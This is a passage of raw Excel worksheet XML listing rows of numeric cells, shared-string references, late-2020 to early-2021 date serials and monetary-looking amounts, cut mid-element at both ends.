        <v>10932</v>
      </c>
    </row>
    <row r="2387" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2387">
        <v>22080</v>
      </c>
      <c r="B2387">
        <v>2097</v>
      </c>
      <c r="C2387" t="s">
        <v>6070</v>
      </c>
      <c r="D2387" t="s">
        <v>11022</v>
      </c>
      <c r="E2387">
        <v>2</v>
      </c>
      <c r="F2387" t="s">
        <v>11676</v>
      </c>
      <c r="G2387" s="1">
        <v>44095</v>
      </c>
      <c r="H2387">
        <v>200000</v>
      </c>
      <c r="I2387" t="s">
        <v>9603</v>
      </c>
      <c r="J2387" t="s">
        <v>10932</v>
      </c>
    </row>
    <row r="2388" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2388">
        <v>22081</v>
      </c>
      <c r="B2388">
        <v>2097</v>
      </c>
      <c r="C2388" t="s">
        <v>6070</v>
      </c>
      <c r="D2388" t="s">
        <v>11022</v>
      </c>
      <c r="E2388">
        <v>2</v>
      </c>
      <c r="F2388" t="s">
        <v>9577</v>
      </c>
      <c r="G2388" s="1">
        <v>44095</v>
      </c>
      <c r="H2388">
        <v>200000</v>
      </c>
      <c r="I2388" t="s">
        <v>9603</v>
      </c>
      <c r="J2388" t="s">
        <v>10932</v>
      </c>
    </row>
    <row r="2389" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2389">
        <v>22082</v>
      </c>
      <c r="B2389">
        <v>233</v>
      </c>
      <c r="C2389" t="s">
        <v>421</v>
      </c>
      <c r="D2389" t="s">
        <v>10086</v>
      </c>
      <c r="E2389">
        <v>16</v>
      </c>
      <c r="F2389" t="s">
        <v>9435</v>
      </c>
      <c r="G2389" s="1">
        <v>44081</v>
      </c>
      <c r="H2389">
        <v>1000000</v>
      </c>
      <c r="J2389" t="s">
        <v>11585</v>
      </c>
    </row>
    <row r="2390" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2390">
        <v>22083</v>
      </c>
      <c r="B2390">
        <v>837</v>
      </c>
      <c r="C2390" t="s">
        <v>1859</v>
      </c>
      <c r="D2390" t="s">
        <v>9479</v>
      </c>
      <c r="E2390">
        <v>13</v>
      </c>
      <c r="F2390" t="s">
        <v>7746</v>
      </c>
      <c r="G2390" s="1">
        <v>44119</v>
      </c>
      <c r="H2390">
        <v>10000</v>
      </c>
      <c r="I2390" t="s">
        <v>11301</v>
      </c>
      <c r="J2390" t="s">
        <v>9518</v>
      </c>
    </row>
    <row r="2391" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2391">
        <v>22085</v>
      </c>
      <c r="B2391">
        <v>940</v>
      </c>
      <c r="C2391" t="s">
        <v>3316</v>
      </c>
      <c r="D2391" t="s">
        <v>11803</v>
      </c>
      <c r="E2391">
        <v>16</v>
      </c>
      <c r="F2391" t="s">
        <v>3318</v>
      </c>
      <c r="G2391" s="1">
        <v>44155</v>
      </c>
      <c r="H2391">
        <v>250</v>
      </c>
      <c r="I2391" t="s">
        <v>11804</v>
      </c>
      <c r="J2391" t="s">
        <v>10330</v>
      </c>
    </row>
    <row r="2392" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2392">
        <v>22086</v>
      </c>
      <c r="B2392">
        <v>4909</v>
      </c>
      <c r="C2392" t="s">
        <v>7520</v>
      </c>
      <c r="D2392" t="s">
        <v>11805</v>
      </c>
      <c r="E2392">
        <v>32</v>
      </c>
      <c r="F2392" t="s">
        <v>1746</v>
      </c>
      <c r="G2392" s="1">
        <v>44216</v>
      </c>
      <c r="H2392">
        <v>150000</v>
      </c>
      <c r="I2392" t="s">
        <v>11806</v>
      </c>
      <c r="J2392" t="s">
        <v>11807</v>
      </c>
    </row>
    <row r="2393" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2393">
        <v>22089</v>
      </c>
      <c r="B2393">
        <v>1951</v>
      </c>
      <c r="C2393" t="s">
        <v>6166</v>
      </c>
      <c r="D2393" t="s">
        <v>11694</v>
      </c>
      <c r="E2393">
        <v>31</v>
      </c>
      <c r="F2393" t="s">
        <v>11643</v>
      </c>
      <c r="G2393" s="1">
        <v>44098</v>
      </c>
      <c r="H2393">
        <v>10000</v>
      </c>
      <c r="I2393" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2394" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2394">
        <v>22092</v>
      </c>
      <c r="B2394">
        <v>2046</v>
      </c>
      <c r="C2394" t="s">
        <v>6207</v>
      </c>
      <c r="D2394" t="s">
        <v>11808</v>
      </c>
      <c r="E2394">
        <v>14</v>
      </c>
      <c r="F2394" t="s">
        <v>11676</v>
      </c>
      <c r="G2394" s="1">
        <v>44151</v>
      </c>
      <c r="H2394">
        <v>5000</v>
      </c>
      <c r="I2394" t="s">
        <v>9536</v>
      </c>
      <c r="J2394" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="2395" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2395">
        <v>22093</v>
      </c>
      <c r="B2395">
        <v>2046</v>
      </c>
      <c r="C2395" t="s">
        <v>6207</v>
      </c>
      <c r="D2395" t="s">
        <v>11808</v>
      </c>
      <c r="E2395">
        <v>14</v>
      </c>
      <c r="F2395" t="s">
        <v>364</v>
      </c>
      <c r="G2395" s="1">
        <v>44151</v>
      </c>
      <c r="H2395">
        <v>10000</v>
      </c>
      <c r="I2395" t="s">
        <v>11809</v>
      </c>
      <c r="J2395" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="2396" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2396">
        <v>22094</v>
      </c>
      <c r="B2396">
        <v>2046</v>
      </c>
      <c r="C2396" t="s">
        <v>6207</v>
      </c>
      <c r="D2396" t="s">
        <v>11808</v>
      </c>
      <c r="E2396">
        <v>14</v>
      </c>
      <c r="F2396" t="s">
        <v>9453</v>
      </c>
      <c r="G2396" s="1">
        <v>44151</v>
      </c>
      <c r="H2396">
        <v>5000</v>
      </c>
      <c r="I2396" t="s">
        <v>11809</v>
      </c>
      <c r="J2396" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="2397" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2397">
        <v>22104</v>
      </c>
      <c r="B2397">
        <v>907</v>
      </c>
      <c r="C2397" t="s">
        <v>3454</v>
      </c>
      <c r="D2397" t="s">
        <v>11810</v>
      </c>
      <c r="E2397">
        <v>27</v>
      </c>
      <c r="F2397" t="s">
        <v>9900</v>
      </c>
      <c r="G2397" s="1">
        <v>44074</v>
      </c>
      <c r="H2397">
        <v>50000</v>
      </c>
      <c r="I2397" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2398" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2398">
        <v>22105</v>
      </c>
      <c r="B2398">
        <v>907</v>
      </c>
      <c r="C2398" t="s">
        <v>3454</v>
      </c>
      <c r="D2398" t="s">
        <v>11810</v>
      </c>
      <c r="E2398">
        <v>27</v>
      </c>
      <c r="F2398" t="s">
        <v>10589</v>
      </c>
      <c r="G2398" s="1">
        <v>44074</v>
      </c>
      <c r="H2398">
        <v>700000</v>
      </c>
      <c r="I2398" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2399" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2399">
        <v>22106</v>
      </c>
      <c r="B2399">
        <v>907</v>
      </c>
      <c r="C2399" t="s">
        <v>3454</v>
      </c>
      <c r="D2399" t="s">
        <v>11810</v>
      </c>
      <c r="E2399">
        <v>27</v>
      </c>
      <c r="F2399" t="s">
        <v>11811</v>
      </c>
      <c r="G2399" s="1">
        <v>44074</v>
      </c>
      <c r="H2399">
        <v>10000</v>
      </c>
      <c r="I2399" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2400" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2400">
        <v>22107</v>
      </c>
      <c r="B2400">
        <v>907</v>
      </c>
      <c r="C2400" t="s">
        <v>3454</v>
      </c>
      <c r="D2400" t="s">
        <v>11810</v>
      </c>
      <c r="E2400">
        <v>27</v>
      </c>
      <c r="F2400" t="s">
        <v>2236</v>
      </c>
      <c r="G2400" s="1">
        <v>44074</v>
      </c>
      <c r="H2400">
        <v>20000</v>
      </c>
      <c r="I2400" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2401" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2401">
        <v>22111</v>
      </c>
      <c r="B2401">
        <v>4775</v>
      </c>
      <c r="C2401" t="s">
        <v>7147</v>
      </c>
      <c r="D2401" t="s">
        <v>11239</v>
      </c>
      <c r="E2401">
        <v>16</v>
      </c>
      <c r="F2401" t="s">
        <v>2236</v>
      </c>
      <c r="G2401" s="1">
        <v>44116</v>
      </c>
      <c r="H2401">
        <v>300000</v>
      </c>
      <c r="I2401" t="s">
        <v>11812</v>
      </c>
      <c r="J2401" t="s">
        <v>11813</v>
      </c>
    </row>
    <row r="2402" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2402">
        <v>22112</v>
      </c>
      <c r="B2402">
        <v>4775</v>
      </c>
      <c r="C2402" t="s">
        <v>7147</v>
      </c>
      <c r="D2402" t="s">
        <v>11239</v>
      </c>
      <c r="E2402">
        <v>16</v>
      </c>
      <c r="F2402" t="s">
        <v>9437</v>
      </c>
      <c r="G2402" s="1">
        <v>44116</v>
      </c>
      <c r="H2402">
        <v>600000</v>
      </c>
      <c r="I2402" t="s">
        <v>11814</v>
      </c>
      <c r="J2402" t="s">
        <v>10045</v>
      </c>
    </row>
    <row r="2403" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2403">
        <v>22113</v>
      </c>
      <c r="B2403">
        <v>4775</v>
      </c>
      <c r="C2403" t="s">
        <v>7147</v>
      </c>
      <c r="D2403" t="s">
        <v>11239</v>
      </c>
      <c r="E2403">
        <v>16</v>
      </c>
      <c r="F2403" t="s">
        <v>9849</v>
      </c>
      <c r="G2403" s="1">
        <v>44116</v>
      </c>
      <c r="H2403">
        <v>300000</v>
      </c>
      <c r="I2403" t="s">
        <v>9550</v>
      </c>
      <c r="J2403" t="s">
        <v>11815</v>
      </c>
    </row>
    <row r="2404" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2404">
        <v>22114</v>
      </c>
      <c r="B2404">
        <v>4775</v>
      </c>
      <c r="C2404" t="s">
        <v>7147</v>
      </c>
      <c r="D2404" t="s">
        <v>11239</v>
      </c>
      <c r="E2404">
        <v>16</v>
      </c>
      <c r="F2404" t="s">
        <v>9435</v>
      </c>
      <c r="G2404" s="1">
        <v>44116</v>
      </c>
      <c r="H2404">
        <v>150000</v>
      </c>
      <c r="I2404" t="s">
        <v>9550</v>
      </c>
      <c r="J2404" t="s">
        <v>11816</v>
      </c>
    </row>
    <row r="2405" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2405">
        <v>22115</v>
      </c>
      <c r="B2405">
        <v>1756</v>
      </c>
      <c r="C2405" t="s">
        <v>6228</v>
      </c>
      <c r="D2405" t="s">
        <v>11817</v>
      </c>
      <c r="E2405">
        <v>28</v>
      </c>
      <c r="F2405" t="s">
        <v>10840</v>
      </c>
      <c r="G2405" s="1">
        <v>44141</v>
      </c>
      <c r="H2405">
        <v>200000</v>
      </c>
    </row>
    <row r="2406" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2406">
        <v>22116</v>
      </c>
      <c r="B2406">
        <v>1756</v>
      </c>
      <c r="C2406" t="s">
        <v>6228</v>
      </c>
      <c r="D2406" t="s">
        <v>11817</v>
      </c>
      <c r="E2406">
        <v>28</v>
      </c>
      <c r="F2406" t="s">
        <v>3763</v>
      </c>
      <c r="G2406" s="1">
        <v>44141</v>
      </c>
      <c r="H2406">
        <v>20000</v>
      </c>
      <c r="I2406" t="s">
        <v>9550</v>
      </c>
      <c r="J2406" t="s">
        <v>11818</v>
      </c>
    </row>
    <row r="2407" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2407">
        <v>22117</v>
      </c>
      <c r="B2407">
        <v>1756</v>
      </c>
      <c r="C2407" t="s">
        <v>6228</v>
      </c>
      <c r="D2407" t="s">
        <v>11817</v>
      </c>
      <c r="E2407">
        <v>28</v>
      </c>
      <c r="F2407" t="s">
        <v>11726</v>
      </c>
      <c r="G2407" s="1">
        <v>44141</v>
      </c>
      <c r="H2407">
        <v>5000</v>
      </c>
      <c r="I2407" t="s">
        <v>9899</v>
      </c>
    </row>
    <row r="2408" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2408">
        <v>22118</v>
      </c>
      <c r="B2408">
        <v>1756</v>
      </c>
      <c r="C2408" t="s">
        <v>6228</v>
      </c>
      <c r="D2408" t="s">
        <v>11817</v>
      </c>
      <c r="E2408">
        <v>28</v>
      </c>
      <c r="F2408" t="s">
        <v>11819</v>
      </c>
      <c r="G2408" s="1">
        <v>44141</v>
      </c>
      <c r="H2408">
        <v>3000</v>
      </c>
    </row>
    <row r="2409" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2409">
        <v>22119</v>
      </c>
      <c r="B2409">
        <v>2098</v>
      </c>
      <c r="C2409" t="s">
        <v>5668</v>
      </c>
      <c r="D2409" t="s">
        <v>11820</v>
      </c>
      <c r="E2409">
        <v>16</v>
      </c>
      <c r="F2409" t="s">
        <v>547</v>
      </c>
      <c r="G2409" s="1">
        <v>44117</v>
      </c>
      <c r="H2409">
        <v>7000</v>
      </c>
      <c r="I2409" t="s">
        <v>11821</v>
      </c>
      <c r="J2409" t="s">
        <v>11822</v>
      </c>
    </row>
    <row r="2410" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2410">
        <v>22120</v>
      </c>
      <c r="B2410">
        <v>2098</v>
      </c>
      <c r="C2410" t="s">
        <v>5668</v>
      </c>
      <c r="D2410" t="s">
        <v>11820</v>
      </c>
      <c r="E2410">
        <v>16</v>
      </c>
      <c r="F2410" t="s">
        <v>3204</v>
      </c>
      <c r="G2410" s="1">
        <v>44117</v>
      </c>
      <c r="H2410">
        <v>1500</v>
      </c>
      <c r="I2410" t="s">
        <v>11823</v>
      </c>
      <c r="J2410" t="s">
        <v>11822</v>
      </c>
    </row>
    <row r="2411" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2411">
        <v>22121</v>
      </c>
      <c r="B2411">
        <v>2098</v>
      </c>
      <c r="C2411" t="s">
        <v>5668</v>
      </c>
      <c r="D2411" t="s">
        <v>11820</v>
      </c>
      <c r="E2411">
        <v>16</v>
      </c>
      <c r="F2411" t="s">
        <v>7564</v>
      </c>
      <c r="G2411" s="1">
        <v>44117</v>
      </c>
      <c r="H2411">
        <v>5000</v>
      </c>
      <c r="I2411" t="s">
        <v>11823</v>
      </c>
      <c r="J2411" t="s">
        <v>11822</v>
      </c>
    </row>
    <row r="2412" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2412">
        <v>22123</v>
      </c>
      <c r="B2412">
        <v>2528</v>
      </c>
      <c r="C2412" t="s">
        <v>5079</v>
      </c>
      <c r="D2412" t="s">
        <v>10081</v>
      </c>
      <c r="E2412">
        <v>10</v>
      </c>
      <c r="F2412" t="s">
        <v>8913</v>
      </c>
      <c r="G2412" s="1">
        <v>44106</v>
      </c>
      <c r="H2412">
        <v>300000</v>
      </c>
      <c r="I2412" t="s">
        <v>11824</v>
      </c>
      <c r="J2412" t="s">
        <v>10780</v>
      </c>
    </row>
    <row r="2413" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2413">
        <v>22124</v>
      </c>
      <c r="B2413">
        <v>4921</v>
      </c>
      <c r="C2413" t="s">
        <v>7496</v>
      </c>
      <c r="D2413" t="s">
        <v>11825</v>
      </c>
      <c r="E2413">
        <v>14</v>
      </c>
      <c r="F2413" t="s">
        <v>11826</v>
      </c>
      <c r="G2413" s="1">
        <v>44272</v>
      </c>
      <c r="H2413">
        <v>75000</v>
      </c>
      <c r="I2413" t="s">
        <v>11827</v>
      </c>
    </row>
    <row r="2414" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2414">
        <v>22125</v>
      </c>
      <c r="B2414">
        <v>4921</v>
      </c>
      <c r="C2414" t="s">
        <v>7496</v>
      </c>
      <c r="D2414" t="s">
        <v>11825</v>
      </c>
      <c r="E2414">
        <v>14</v>
      </c>
      <c r="F2414" t="s">
        <v>11828</v>
      </c>
      <c r="G2414" s="1">
        <v>44272</v>
      </c>
      <c r="H2414">
        <v>80000</v>
      </c>
      <c r="I2414" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="2415" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2415">
        <v>22126</v>
      </c>
      <c r="B2415">
        <v>4921</v>
      </c>
      <c r="C2415" t="s">
        <v>7496</v>
      </c>
      <c r="D2415" t="s">
        <v>11825</v>
      </c>
      <c r="E2415">
        <v>14</v>
      </c>
      <c r="F2415" t="s">
        <v>9437</v>
      </c>
      <c r="G2415" s="1">
        <v>44272</v>
      </c>
      <c r="H2415">
        <v>120000</v>
      </c>
      <c r="I2415" t="s">
        <v>9693</v>
      </c>
      <c r="J2415" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="2416" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2416">
        <v>22127</v>
      </c>
      <c r="B2416">
        <v>4921</v>
      </c>
      <c r="C2416" t="s">
        <v>7496</v>
      </c>
      <c r="D2416" t="s">
        <v>11825</v>
      </c>
      <c r="E2416">
        <v>14</v>
      </c>
      <c r="F2416" t="s">
        <v>10543</v>
      </c>
      <c r="G2416" s="1">
        <v>44272</v>
      </c>
      <c r="H2416">
        <v>50000</v>
      </c>
      <c r="I2416" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="2417" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2417">
        <v>22128</v>
      </c>
      <c r="B2417">
        <v>4921</v>
      </c>
      <c r="C2417" t="s">
        <v>7496</v>
      </c>
      <c r="D2417" t="s">
        <v>11825</v>
      </c>
      <c r="E2417">
        <v>14</v>
      </c>
      <c r="F2417" t="s">
        <v>1746</v>
      </c>
      <c r="G2417" s="1">
        <v>44272</v>
      </c>
      <c r="H2417">
        <v>15000</v>
      </c>
      <c r="I2417" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="2418" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2418">
        <v>22129</v>
      </c>
      <c r="B2418">
        <v>4921</v>
      </c>
      <c r="C2418" t="s">
        <v>7496</v>
      </c>
      <c r="D2418" t="s">
        <v>11825</v>
      </c>
      <c r="E2418">
        <v>14</v>
      </c>
      <c r="F2418" t="s">
        <v>2236</v>
      </c>
      <c r="G2418" s="1">
        <v>44272</v>
      </c>
      <c r="H2418">
        <v>10000</v>
      </c>
      <c r="I2418" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="2419" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2419">
        <v>22130</v>
      </c>
      <c r="B2419">
        <v>4921</v>
      </c>
      <c r="C2419" t="s">
        <v>7496</v>
      </c>
      <c r="D2419" t="s">
        <v>11825</v>
      </c>
      <c r="E2419">
        <v>14</v>
      </c>
      <c r="F2419" t="s">
        <v>3763</v>
      </c>
      <c r="G2419" s="1">
        <v>44272</v>
      </c>
      <c r="H2419">
        <v>5000</v>
      </c>
      <c r="I2419" t="s">
        <v>11829</v>
      </c>
    </row>
    <row r="2420" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2420">
        <v>22131</v>
      </c>
      <c r="B2420">
        <v>4921</v>
      </c>
      <c r="C2420" t="s">
        <v>7496</v>
      </c>
      <c r="D2420" t="s">
        <v>11825</v>
      </c>
      <c r="E2420">
        <v>14</v>
      </c>
      <c r="F2420" t="s">
        <v>7241</v>
      </c>
      <c r="G2420" s="1">
        <v>44272</v>
      </c>
      <c r="H2420">
        <v>10000</v>
      </c>
      <c r="I2420" t="s">
        <v>11829</v>
      </c>
    </row>
    <row r="2421" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2421">
        <v>22132</v>
      </c>
      <c r="B2421">
        <v>4921</v>
      </c>
      <c r="C2421" t="s">
        <v>7496</v>
      </c>
      <c r="D2421" t="s">
        <v>11825</v>
      </c>
      <c r="E2421">
        <v>14</v>
      </c>
      <c r="F2421" t="s">
        <v>9435</v>
      </c>
      <c r="G2421" s="1">
        <v>44272</v>
      </c>
      <c r="H2421">
        <v>12000</v>
      </c>
      <c r="I2421" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="2422" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2422">
        <v>22133</v>
      </c>
      <c r="B2422">
        <v>1970</v>
      </c>
      <c r="C2422" t="s">
        <v>6220</v>
      </c>
      <c r="D2422" t="s">
        <v>11685</v>
      </c>
      <c r="E2422">
        <v>15</v>
      </c>
      <c r="F2422" t="s">
        <v>11554</v>
      </c>
      <c r="G2422" s="1">
        <v>44070</v>
      </c>
      <c r="H2422">
        <v>5000</v>
      </c>
      <c r="J2422" t="s">
        <v>11830</v>
      </c>
    </row>
    <row r="2423" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2423">
        <v>22134</v>
      </c>
      <c r="B2423">
        <v>4919</v>
      </c>
      <c r="C2423" t="s">
        <v>7541</v>
      </c>
      <c r="D2423" t="s">
        <v>11831</v>
      </c>
      <c r="E2423">
        <v>16</v>
      </c>
      <c r="F2423" t="s">
        <v>11832</v>
      </c>
      <c r="G2423" s="1">
        <v>44204</v>
      </c>
      <c r="H2423">
        <v>0</v>
      </c>
      <c r="I2423" t="s">
        <v>11833</v>
      </c>
      <c r="J2423" t="s">
        <v>11834</v>
      </c>
    </row>
    <row r="2424" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2424">
        <v>22135</v>
      </c>
      <c r="B2424">
        <v>1202</v>
      </c>
      <c r="C2424" t="s">
        <v>3476</v>
      </c>
      <c r="D2424" t="s">
        <v>11835</v>
      </c>
      <c r="E2424">
        <v>23</v>
      </c>
      <c r="F2424" t="s">
        <v>1746</v>
      </c>
      <c r="G2424" s="1">
        <v>44095</v>
      </c>
      <c r="H2424">
        <v>120000</v>
      </c>
      <c r="I2424" t="s">
        <v>11836</v>
      </c>
      <c r="J2424" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="2425" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2425">
        <v>22140</v>
      </c>
      <c r="B2425">
        <v>242</v>
      </c>
      <c r="C2425" t="s">
        <v>1130</v>
      </c>
      <c r="D2425" t="s">
        <v>11697</v>
      </c>
      <c r="E2425">
        <v>16</v>
      </c>
      <c r="F2425" t="s">
        <v>11837</v>
      </c>
      <c r="G2425" s="1">
        <v>44124</v>
      </c>
      <c r="H2425">
        <v>1000</v>
      </c>
      <c r="J2425" t="s">
        <v>11838</v>
      </c>
    </row>
    <row r="2426" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2426">
        <v>22142</v>
      </c>
      <c r="B2426">
        <v>384</v>
      </c>
      <c r="C2426" t="s">
        <v>1493</v>
      </c>
      <c r="D2426" t="s">
        <v>11839</v>
      </c>
      <c r="E2426">
        <v>16</v>
      </c>
      <c r="F2426" t="s">
        <v>3076</v>
      </c>
      <c r="G2426" s="1">
        <v>44124</v>
      </c>
      <c r="H2426">
        <v>1200000</v>
      </c>
      <c r="I2426" t="s">
        <v>11840</v>
      </c>
      <c r="J2426" t="s">
        <v>11841</v>
      </c>
    </row>
    <row r="2427" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2427">
        <v>22143</v>
      </c>
      <c r="B2427">
        <v>480</v>
      </c>
      <c r="C2427" t="s">
        <v>1866</v>
      </c>
      <c r="D2427" t="s">
        <v>11842</v>
      </c>
      <c r="E2427">
        <v>16</v>
      </c>
      <c r="F2427" t="s">
        <v>11843</v>
      </c>
      <c r="G2427" s="1">
        <v>44154</v>
      </c>
      <c r="H2427">
        <v>2000000</v>
      </c>
      <c r="J2427" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="2428" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2428">
        <v>22144</v>
      </c>
      <c r="B2428">
        <v>480</v>
      </c>
      <c r="C2428" t="s">
        <v>1866</v>
      </c>
      <c r="D2428" t="s">
        <v>11842</v>
      </c>
      <c r="E2428">
        <v>16</v>
      </c>
      <c r="F2428" t="s">
        <v>11844</v>
      </c>
      <c r="G2428" s="1">
        <v>44154</v>
      </c>
      <c r="H2428">
        <v>300000</v>
      </c>
      <c r="J2428" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="2429" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2429">
        <v>22145</v>
      </c>
      <c r="B2429">
        <v>480</v>
      </c>
      <c r="C2429" t="s">
        <v>1866</v>
      </c>
      <c r="D2429" t="s">
        <v>11842</v>
      </c>
      <c r="E2429">
        <v>16</v>
      </c>
      <c r="F2429" t="s">
        <v>9437</v>
      </c>
      <c r="G2429" s="1">
        <v>44154</v>
      </c>
      <c r="H2429">
        <v>300000</v>
      </c>
      <c r="J2429" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="2430" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2430">
        <v>22146</v>
      </c>
      <c r="B2430">
        <v>480</v>
      </c>
      <c r="C2430" t="s">
        <v>1866</v>
      </c>
      <c r="D2430" t="s">
        <v>11842</v>
      </c>
      <c r="E2430">
        <v>16</v>
      </c>
      <c r="F2430" t="s">
        <v>9435</v>
      </c>
      <c r="G2430" s="1">
        <v>44154</v>
      </c>
      <c r="H2430">
        <v>100000</v>
      </c>
      <c r="J2430" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="2431" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2431">
        <v>22147</v>
      </c>
      <c r="B2431">
        <v>480</v>
      </c>
      <c r="C2431" t="s">
        <v>1866</v>
      </c>
      <c r="D2431" t="s">
        <v>11842</v>
      </c>
      <c r="E2431">
        <v>16</v>
      </c>
      <c r="F2431" t="s">
        <v>1746</v>
      </c>
      <c r="G2431" s="1">
        <v>44154</v>
      </c>
      <c r="H2431">
        <v>100</v>
      </c>
      <c r="J2431" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="2432" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2432">
        <v>22148</v>
      </c>
      <c r="B2432">
        <v>480</v>
      </c>
      <c r="C2432" t="s">
        <v>1866</v>
      </c>
      <c r="D2432" t="s">
        <v>11842</v>
      </c>
      <c r="E2432">
        <v>16</v>
      </c>
      <c r="F2432" t="s">
        <v>9523</v>
      </c>
      <c r="G2432" s="1">
        <v>44154</v>
      </c>
      <c r="H2432">
        <v>10000</v>
      </c>
      <c r="J2432" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="2433" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2433">
        <v>22149</v>
      </c>
      <c r="B2433">
        <v>384</v>
      </c>
      <c r="C2433" t="s">
        <v>1493</v>
      </c>
      <c r="D2433" t="s">
        <v>11839</v>
      </c>
      <c r="E2433">
        <v>16</v>
      </c>
      <c r="F2433" t="s">
        <v>11845</v>
      </c>
      <c r="G2433" s="1">
        <v>44124</v>
      </c>
      <c r="H2433">
        <v>100</v>
      </c>
      <c r="J2433" t="s">
        <v>11846</v>
      </c>
    </row>
    <row r="2434" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2434">
        <v>22150</v>
      </c>
      <c r="B2434">
        <v>480</v>
      </c>
      <c r="C2434" t="s">
        <v>1866</v>
      </c>
      <c r="D2434" t="s">
        <v>11842</v>
      </c>
      <c r="E2434">
        <v>16</v>
      </c>
      <c r="F2434" t="s">
        <v>11847</v>
      </c>
      <c r="G2434" s="1">
        <v>44154</v>
      </c>
      <c r="H2434">
        <v>0</v>
      </c>
      <c r="J2434" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="2435" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2435">
        <v>22151</v>
      </c>
      <c r="B2435">
        <v>480</v>
      </c>
      <c r="C2435" t="s">
        <v>1866</v>
      </c>
      <c r="D2435" t="s">
        <v>11842</v>
      </c>
      <c r="E2435">
        <v>16</v>
      </c>
      <c r="F2435" t="s">
        <v>9722</v>
      </c>
      <c r="G2435" s="1">
        <v>44154</v>
      </c>
      <c r="H2435">
        <v>0</v>
      </c>
      <c r="J2435" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="2436" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2436">
        <v>22152</v>
      </c>
      <c r="B2436">
        <v>480</v>
      </c>
      <c r="C2436" t="s">
        <v>1866</v>
      </c>
      <c r="D2436" t="s">
        <v>11842</v>
      </c>
      <c r="E2436">
        <v>16</v>
      </c>
      <c r="F2436" t="s">
        <v>9846</v>
      </c>
      <c r="G2436" s="1">
        <v>44154</v>
      </c>
      <c r="H2436">
        <v>0</v>
      </c>
      <c r="J2436" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="2437" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2437">
        <v>22153</v>
      </c>
      <c r="B2437">
        <v>480</v>
      </c>
      <c r="C2437" t="s">
        <v>1866</v>
      </c>
      <c r="D2437" t="s">
        <v>11842</v>
      </c>
      <c r="E2437">
        <v>16</v>
      </c>
      <c r="F2437" t="s">
        <v>9472</v>
      </c>
      <c r="G2437" s="1">
        <v>44154</v>
      </c>
      <c r="H2437">
        <v>0</v>
      </c>
      <c r="J2437" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="2438" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2438">
        <v>22154</v>
      </c>
      <c r="B2438">
        <v>480</v>
      </c>
      <c r="C2438" t="s">
        <v>1866</v>
      </c>
      <c r="D2438" t="s">
        <v>11842</v>
      </c>
      <c r="E2438">
        <v>16</v>
      </c>
      <c r="F2438" t="s">
